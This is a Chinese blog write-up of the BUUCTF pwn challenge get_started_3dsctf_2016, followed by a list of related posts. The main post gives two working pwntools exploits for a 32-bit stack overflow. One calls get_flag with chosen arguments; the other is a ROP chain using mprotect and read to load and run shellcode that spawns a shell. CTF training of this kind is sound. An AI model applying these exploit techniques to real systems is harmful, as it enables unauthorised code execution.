buuctf|buuctf|get_started_3dsctf_2016 1

最新推荐文章于 2024-11-14 23:59:53 发布
最新推荐文章于 2024-11-14 23:59:53 发布
阅读量406 收藏 1
点赞数 1
分类专栏: buuctf pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64236521/article/details/124534284
版权

栈溢出 mprotect 远程代码执行 ida shellcode
关键词由CSDN通过智能技术生成
buuctf 同时被 2 个专栏收录
10 篇文章 1 订阅
订阅专栏
pwn
6 篇文章 1 订阅
订阅专栏

方法一

我将文件下载后将其重命名为pwn_13,checksec一下
在这里插入图片描述
可以直接栈溢出,32位,进入ida
在这里插入图片描述
在这里插入图片描述
gets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看
在这里插入图片描述

只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit()
在这里插入图片描述
exp如下

from pwn import*
p=remote('node4.buuoj.cn',26832)
context.log_level='debug'
payload=b'a'*0x38+p32(0x80489A0)+p32(0x804E6A0)+p32(814536271)+p32(425138641)
p.sendline(payload)
p.recv()

这里context.log_level='debug’别删,不然看不到flag
在这里插入图片描述

方法二

ida中我们可以发现mprotext函数和read函数
mprotext函数用法如下

int mprotect(void *addr, size_t len, int prot);
addr 内存启始地址
len  修改内存的长度
prot 内存的权限

简单来说,就是以addr为起始地址将长度为len的内存权限修改为’prot‘。当prot值为7时,代表可读可写可执行。
这时候有了思路,我们可以用mprotext()使一段内存可读可写可执行,然后用read()将构造的shellcode放入这段内存中。
由于mprotext有三个参数,我们pop要用到三个寄存器,ROPgadget一下
在这里插入图片描述
这里我用的0x080509a5作为mprotext的返回地址
ida中ctrl+s一下,找个有读写权限的传入mprotext()
在这里插入图片描述

我用的是0x80EB000
有了思路就可以写exp了

from pwn import*
p=remote('node4.buuoj.cn',26832)

mprotext_addr=0x806ec80
pop3_addr=0x80509a5
buf=0x80EB000
read_addr=0x806E140
payload=b'a'*0x38+p32(mprotext_addr)+p32(pop3_addr)+p32(buf)+p32(0x1000)+p32(0x7)+p32(read_addr)+p32(buf)+p32(0)+p32(buf)+p32(0x200)
p.sendline(payload)
shellcode=asm(shellcraft.sh(),arch='i386',os='linux')
p.sendline(shellcode)

p.interactive()

在这里插入图片描述

嚚_瘖
关注
专栏目录
get_started_3dsctf_2016 1
qq_41560595的博客
03-18 815
又是被暴击的一天。 查看文件权限 可以栈溢出,地址写死了。 查看源程序 还是个静态文件,首先想到可以使用Gadget。 分析 存在一个mprotect函数: #include <unistd.h> #include <sys/mmap.h> int mprotect(const void *start, size_t len, int prot); mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot代表着 r-w-x
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 365
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTF get_started_3dsctf_2016
qq_51821131的博客
07-23 267
记录在csdn里面看到的暴力解法 from pwn import * context(os="linux", arch="i386", log_level="debug") q = process("./get_started_3dsctf_2016") elf = ELF("./get_started_3dsctf_2016") mprotect_addr = elf.symbols["mprotect"] read_addr = elf.symbols["read"] # 内存权限改变的起始地址,也
buuctf get_started_3dsctf_2016
carol2358的博客
04-09 470
先checksec 这道题打远程需要改变内存权限,需要用到mprotec,这道题里也是有这个函数的 这道题有点特殊,是没有bp的,程序的函数调用约定是cdecl,依靠sp来进行平衡栈,需要取值就看与sp的偏移。 padding为0x38 大致的思路就是先找到mprotect,bss,read(向bss写入shell),pop(用来pop出mprotect的参数,进行第二次函数调用)的地址,然后传...
BUUCTF--get_started_3dsctf_20161
qq_30528603的博客
01-12 540
题目一进来有很多函数,盲猜是静态编译了。而且在函数堆中发现了个get_flag。信心慢慢的直接写代码返回get_flag地址。2.这题在main函数开始的时候没有压入ebp,因此计算溢出位置不用覆盖ebp。也就是说以前的old_ebp的位置变成了现在的返回地址。1.打远程的时候他将会判断参数是否合规,因此我们要构造get_flag的参数的正确性。这题我本来以为是简单的ret2text.结果还是中了小坑。4.构造垃圾数据不用b‘a',打不通。这题还有一种解法,我是看别的师傅wp才知道的。
BUUCTF-Pwn-get_started_3dsctf_2016
餐桌上的猫
03-04 213
题目截图
BUUCTF - PWN】get_started_3dsctf_2016
古月浪子的博客
03-25 1583
checksec一下,可以栈溢出 IDA打开看看,一个很普通的栈溢出漏洞,有后门函数,应该说是一道非常简单的题了 但是,本地打通非常容易,可是靶机打不通 =_= 于是乎,换个方法,利用mprotect函数修改bss段为rwx,写入shellcode跳过去执行 from pwn import * from LibcSearcher import * context.os='linux' con...
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 514
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
buuctf|get_started_3dsctf_2016 1
m0_64236521的博客
05-01 685
方法一 我将文件下载后将其重命名为pwn_13,checksec一下 可以直接栈溢出,32位,进入ida gets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看 只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit() exp如下 from pwn import* p=remote('node4.buuoj.cn',26832) context.log_level='debu
get_started_3dsctf_2016
qq_45691294的博客
12-17 1413
先进入到题目环境里,程序接收用户输入,然后返回一串字符 checksec查看一下保护,只开启了NX,堆栈不可执行保护 用IDA分析程序,这一段程序很简短,gets函数存在溢出 发现了一个名为get_flag的函数 通过这个函数传入参数,且满足条件(a1 == 814536271 && a2 == 425138641)即可读取到flag 思路就是main函数溢出到返回地址的时候直接溢出到if条件判断里面,即使栈空间被破坏了,但是无所谓,已经输出flag了 这里可以用本地调试判断偏移量
[BUUCTF]PWN11——get_started_3dsctf_2016
mcmuyanga的博客
08-28 4050
[BUUCTF]PWN11——get_started_3dsctf_2016 题目网址:https://buuoj.cn/challenges#get_started_3dsctf_2016 步骤: 第一个方法,本地打通,要自己创建一个flag.txt 例行检查,32位,开启了nx保护 nc一下,看看程序大概的执行情况 32位ida载入,shift+f12查看程序里的字符串,看到了flag.txt 双击跟进,ctrl+x查看哪个函数调用了它,发现了一个函数,当a1=0x308cd64f,a2=0x19
BUUCTF get_started_3dsctf_2016(mprotect)
、moddemod
06-10 550
典型的栈溢出 而且还留了后门 在本地可以拿到flag.txt文件,但是远程不行! 栈不可执行 原型: int mprotect(const void *start, size_t len, int prot) start:需改写属性的内存中开始地址 len:需改写属性的内存长度 prot:需要修改为的指定值 功能: mprotect()函数可以用来修改一段指定内存区域的保护属性。 他把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot可以取以下几个值: 1)PRO.
get_started_3dsctf_2016 题解
lifanxin的博客
12-11 1102
Write Up知识点关键字样本运行静态分析动态调试求解思路求解脚本 知识点关键字 栈溢出,ROP + shellcode 样本 get_started_3dsctf_2016样本下载 运行 检查文件:   32位小端程序;   开启了NX保护,栈保护未开启。 运行程序: 静态分析 动态调试 求解思路 求解脚本 ...
菜鸡摸鱼BUUCTF-GET传参
weixin_45734980的博客
04-06 686
[极客大挑战 2019]Havefun 题目看一眼源代码先 源代码中的注释语句,$cat参数是由get方法传入的,内容是“cat=”后的内容。如果参数内容是"dog",则输出Syc{}的内容。 所以构造url:…/?cat=dog 得到flag。 ...
CTF题之BUUCTF系列:BUUCTF Misc N种方法解决
一只小蜜蜂的博客
07-31 4931
一、名称 BUUCTF Misc N种方法解决 二、题目链接:https://buuoj.cn/challenges 解压缩后是一个exe执行文件 双击执行后,弹出以下提示: 无法打开,未获得结果,换其它解决方法。 三、解题步骤 1、使用winhex工具打开KEY.exe文件,查看一下内部结构 2、发现文档后面有两个等号(==),前面有着data:image/jpg;base64。猜测可能是一个经过base64编码的图片,于是将那一串字符串作为网址,粘贴到浏览器中,打..
BUUCTF:N种方法解决
末初的CSDN博客
09-08 7378
题目地址:https://buuoj.cn/challenges#N%E7%A7%8D%E6%96%B9%E6%B3%95%E8%A7%A3%E5%86%B3 base64解码,发现是png图片数据,使用这个网站可以将base64转为十六进制数据:https://the-x.cn/base64/ 另存为png,得到下图 或者直接将原数据使用html的img标签 <!DOCTYPE html> <html> <head> <title>png</
安全 Rust
最新发布
weixin_43219667的博客
11-14 375
这么做的缺点就是你只能靠自己了:如果不安全代码出错了,比如解引用空指针,可能会导致不安全的内存使用。为了尽可能隔离不安全代码,将不安全代码封装进一个安全的抽象并提供安全 API 是一个好主意,当我们学习不安全函数和方法时会讨论到。这里有五类可以在不安全 Rust 中进行而不能用于安全 Rust 的操作,它们称之为 “不安全的超能力。再者,unsafe 不意味着块中的代码就一定是危险的或者必然导致内存安全问题:其意图在于作为开发者你将会确保 unsafe 块中的代码以有效的方式访问内存。
【论文速读】| F2A:一种利用伪装安全检测智能体进行提示注入的创新方法
m0_73736695的博客
11-11 573
这篇论文研究了大语言模型(LLMs)在内容安全检测领域的广泛应用,尤其是其与安全检测代理结合后的盲目信任问题。作者提出了一种称为"伪造代理攻击"(Feign Agent Attack, F2A)的新型攻击手段,通过伪造的安全检测结果绕过LLM的防御机制,进而让LLM输出有害内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值